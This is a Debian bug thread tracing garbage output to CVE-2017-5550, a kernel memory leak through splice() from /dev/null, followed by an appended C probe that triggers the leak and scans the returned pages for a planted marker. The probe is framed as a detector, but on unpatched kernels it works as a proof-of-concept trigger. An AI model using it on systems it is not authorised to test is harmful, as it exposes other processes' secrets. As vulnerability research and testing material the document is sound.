
Bug#854421: systemd: "systemctl --user cat dirmngr.socket" produced garbage beyond # /dev/null
Control: retitle 854421 [CVE-2017-5550] kernel dumps arbitrary memory when splice()ing from /dev/null

On Tue 2017-02-07 20:21:31 -0500, Ben Hutchings wrote:
> Control: reassign -1 src:linux 4.9.2-2
> Control: close -1 4.9.6-3
> Control: severity -1 serious
> Control: tag -1 security
>
> On Tue, 2017-02-07 at 11:14 -0500, Daniel Kahn Gillmor wrote:
>> On Tue 2017-02-07 10:49:39 -0500, Daniel Kahn Gillmor wrote:
>> >     git clone https://0xacab.org/dkg/debian-bug-854421
>> >     cd debian-bug-854421
>> >     make
>> 
>> Interestingly, on at least one machine I try this on, getting it to
>> reproduce is very infrequent with plain "make", even with the 20 tries
>> on kernel version 4.9.2-2.
>
> It's much less likely to happen if there's only one CPU.
>
>> however, "make strace" seems to tickle the bug further, and makes it
>> much more likely to reproduce on 4.9.2-2, even though it's only one
>> try.
>> 
>> With kernel 4.9.6-3 I haven't been able to reproduce it with either
>> "make" or "make strace".
>
> This is CVE-2017-5550, fixed by:
> https://git.kernel.org/linus/b9dc6f65bc5e232d1c05fe34b5daadc7e8bbf1fb

Thanks for tracking that down, Ben.  I can confirm that it's an infoleak
of the worst kind, unfortunately -- I filled the RAM of a root-owned
userspace process with an arbitrary string, and then triggered the dump
from a non-privileged process and managed to get copies of the arbitrary
string :(

       --dkg
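As an added illustration, not code from this bug report or from the repro repository dkg linked, here is a standalone C probe of the behaviour the retitled bug describes: splice() from /dev/null into a pipe, then drain the pipe and count whatever bytes the kernel hands over. It assumes only standard Linux syscalls (splice is invoked through syscall() so the file builds without _GNU_SOURCE); the marker string is a constructed sample that loosely imitates the plant-a-string check dkg describes, and is not his harness. On a fixed kernel the byte count is 0; kernels that refuse splice from /dev/null outright (EINVAL) make the probe return -1 rather than claiming a clean result. Because the leak is racy (Ben notes it rarely reproduces on one CPU), a zero count over a handful of tries is evidence, not proof, of absence.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

#define CHUNK 65536u  /* bytes requested per splice(); the pipe buffer is page-backed */

/* Return the offset of the first occurrence of `marker` in buf[0..n), or -1. */
long find_marker(const unsigned char *buf, size_t n, const char *marker)
{
    size_t m = strlen(marker);
    if (m == 0 || n < m)
        return -1;
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(buf + i, marker, m) == 0)
            return (long)i;
    return -1;
}

/*
 * Splice from /dev/null into a fresh pipe `tries` times, draining the pipe
 * after every call regardless of what splice() reported, and count the bytes
 * that come out.  A read of /dev/null is EOF, so a correct kernel queues
 * nothing and the result is 0.  If `marker` is non-NULL, every drained chunk
 * is also scanned for it and *marker_hits counts the chunks containing it
 * (our own imitation of dkg's plant-a-string test, not his code).
 * Returns -1 if the kernel refuses the operation (ENOSYS/EPERM/EINVAL).
 */
long probe_dev_null_splice(int tries, const char *marker, long *marker_hits)
{
    static unsigned char buf[CHUNK];
    int pfd[2];
    long leaked = 0;

    if (marker_hits)
        *marker_hits = 0;

    int nullfd = open("/dev/null", O_RDONLY);
    if (nullfd < 0)
        return -1;
    if (pipe(pfd) < 0) {
        close(nullfd);
        return -1;
    }
    /* Non-blocking read end: draining an empty pipe must return EAGAIN, not block. */
    fcntl(pfd[0], F_SETFL, fcntl(pfd[0], F_GETFL) | O_NONBLOCK);

    for (int i = 0; i < tries; i++) {
        /* Raw syscall so the example builds without _GNU_SOURCE feature macros. */
        long n = syscall(SYS_splice, nullfd, NULL, pfd[1], NULL, (size_t)CHUNK, 0U);
        if (n < 0) {
            if (errno == ENOSYS || errno == EPERM || errno == EINVAL) {
                if (leaked == 0)
                    leaked = -1;   /* kernel refuses this splice; nothing to probe */
                break;
            }
            continue;
        }
        /* Drain even when splice() reported 0 bytes: the bug left a page queued anyway. */
        ssize_t r;
        while ((r = read(pfd[0], buf, sizeof buf)) > 0) {
            leaked += r;
            if (marker && marker_hits && find_marker(buf, (size_t)r, marker) >= 0)
                (*marker_hits)++;
        }
    }

    close(pfd[0]);
    close(pfd[1]);
    close(nullfd);
    return leaked;
}

int main(int argc, char **argv)
{
    const char *marker = argc > 1 ? argv[1] : "CANARY-STRING";  /* constructed sample */
    long hits = 0;
    long n = probe_dev_null_splice(50, marker, &hits);

    if (n < 0)
        printf("splice from /dev/null refused by this kernel; nothing to probe\n");
    else
        printf("%ld bytes came out of the pipe over 50 tries; %ld chunks contained \"%s\"\n",
               n, hits, marker);
    return n > 0 ? 1 : 0;
}
```

Run it on several CPUs and in a loop if you want to approximate "make strace" pressure; any non-zero byte count from a device whose read is always EOF is the finding, whether or not the marker ever shows up.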
